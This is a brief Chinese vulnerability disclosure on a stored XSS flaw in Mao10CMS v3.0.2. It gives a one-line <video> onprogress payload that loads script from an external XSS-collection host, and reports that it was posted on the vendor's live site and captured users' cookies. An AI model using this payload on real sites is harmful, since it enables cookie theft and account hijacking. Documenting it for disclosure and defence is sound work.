Mao10CMS v3.0.2 储存型xss

### 简要描述： rt ### 详细说明： 过滤不严。 以官网为例。 社区发布新话题 [<img src="https://images.seebug.org/upload/201501/10171718d194a4fdae1259a045f25d045e542fb0.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10171718d194a4fdae1259a045f25d045e542fb0.jpg) ``` <video width="0" height="0" src="http://www.baidu.com/img/bd_logo1.png" onprogress="document.body.appendChild(document.createElement(/script/.source)).src=id" id="http://xss.re/6896"></video> ``` 成功加载了js [<img src="https://images.seebug.org/upload/201501/101718199a8628bdcf3267a0ed81d32c7f044d9c.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/101718199a8628bdcf3267a0ed81d32c7f044d9c.jpg) 地址 http://www.mao10.com/post-1772.html 然后用户的cookie就来了。。。 [<img src="https://images.seebug.org/upload/201501/1017191916d1ae1066ddd029e344ef3514a7949d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1017191916d1ae1066ddd029e344ef3514a7949d.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201501/1017191916d1ae1066ddd029e344ef3514a7949d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1017191916d1ae1066ddd029e344ef3514a7949d.png)